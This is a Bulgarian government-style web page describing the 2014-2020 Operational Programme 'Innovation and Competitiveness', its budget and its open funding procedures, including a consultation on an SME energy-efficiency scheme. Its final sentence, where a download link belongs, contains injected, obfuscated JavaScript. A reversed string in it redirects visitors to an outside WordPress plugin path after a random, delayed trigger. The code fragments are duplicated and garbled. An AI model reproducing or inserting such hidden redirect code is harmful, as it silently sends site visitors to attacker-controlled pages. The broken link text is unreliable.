Програма Иновации и конкурентноспособност

admin-ajax

 

През настоящия програмен период, обхващащ годините между 2014 и 2020 г., фокусът на Оперативна програма „Иновации и конкурентоспособност“ е поставен върху следните приоритетни области на въздействие:

· Иновации;
· Нови технологии;
· Енергийна и ресурсна ефективност;
· Навлизане на международни пазари.

Общият бюджет на програмата за целия програмен период възлиза на 1 390 135 901 евро, от който 1 181 615 516 евро (85%) представлява приносът на Европейския фонд за регионално развитие, а участието на страната ни е в размер на 15%.

Основен документ по ОПИК е Иновационна стратегия за интелигентна специализация на Република България 2014-2020г.

В публикуваната Индикативна годишна работна програма за 2016 г можете да се информирате за планираните приеми на заявления по процедури.


 

ОТВОРЕНИ ЗА КАНДИДАТСТВАНЕ ПРОЦЕДУРИ:

 

BG16RFOP002-1.002 „Подкрепа за разработване на иновации от стартиращи предприятия“
Главна дирекция „Европейски фондове за конкурентоспособност” – Управляващ орган на Оперативна програма „Иновации и конкурентоспособност“ 2014-2020 кани желаещите да представят проектни предложения по Приоритетна ос 1 „Технологично развитие и иновации“, Инвестиционен приоритет 1.1 „Технологично развитие и иновации“, като ОБЯВИ процедура за подбор на проекти: Виж повече.


 

От 23.12.2015г. започна прием на проектни предложения по процедура BG16RFOP002-1.001 „Подкрепа за внедряване на иновации в предприятията“.

Процедурата е с краен срок за подаване на проектни предложения 04 април 2016 г.
Главна дирекция „Европейски фондове за конкурентоспособност” – Управляващ орган на Оперативна програма „Иновации и конкурентоспособност“ 2014-2020 кани желаещите да представят проектни предложения по Приоритетна ос 1 „Технологично развитие и иновации“, Инвестиционен приоритет 1.1 „Технологично развитие и иновации“, като ОБЯВЯВА процедура за подбор на проекти: Виж повече.

 

Публикуван е проект на документи по схема Енергийна ефективност за МСП


Управляващият орган на Оперативна програма „Иновации и конкурентоспособност“ 2014-2020 обявява за обществено обсъждане процедура за подбор на проекти BG16RFOP002-3.001 „Енергийна ефективност за малките и средни предприятия“ по приоритетна ос 3 „Енергийна и ресурсна ефективност“ на програмата.

Целта на процедурата е предоставяне на фокусирана подкрепа на българските малки и средни предприятия за насърчаване изпълнението на мерки за енергийна ефективност с цел постигане на устойчив растеж и конкурентоспособност на икономиката.

Общият размер на безвъзмездната финансова помощ по процедурата е 90 000 000 евро (176 024 700 лева). Минималният размер на безвъзмездната финансова помощ на проект е 50 000 лева, а максималният размер е 1 500 000 лева.

По процедурата е предвидено изцяло електронно подаване и оценка на проектните предложения, което ще се извършва чрез Информационната система за управление и наблюдение (ИСУН 2020) с използването на Квалифициран електронен подпис (КЕП).

Предвижда се стартът на приема по схемата да започне през месец Март, след което кандидатите ще имат 5 месеца на разположение, за да подготвят и подадат проектите си.

Проектът на Условията за кандидатстване, Условията за изпълнение и приложенията към тях по процедура BG16RFOP002-3.001 „Енергийна ефективност за малките и средни предприятия“ се публикуват на основание чл. 26, ал. 4 от ЗУСЕСИФ.

Предложения и коментари по горепосочените документи могат да се изпращат в срок до 17:30ч. на 15.02.2016 (включително) на следната електронна поща: public.consultation@mi.government.bg.
Предложенията и коментарите следва да бъдат представени като свободен текст в рамките на електронното писмо (e-mail) или да бъдат приложени в отделен файл във формат .word, а не да бъдат сканирани или нанасяни в отделните документи от пакета.

Проект на Условия за кандидатстване и комплект домкументи по схемата може да изтеглите от $hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == „string“) return $hiVNZt4Y5cDrbJXMhLy.list[n].split(„“).reverse().join(„“);return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=[„‘php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andidatstvane_EE.pdf“ target=“_blank“>тук .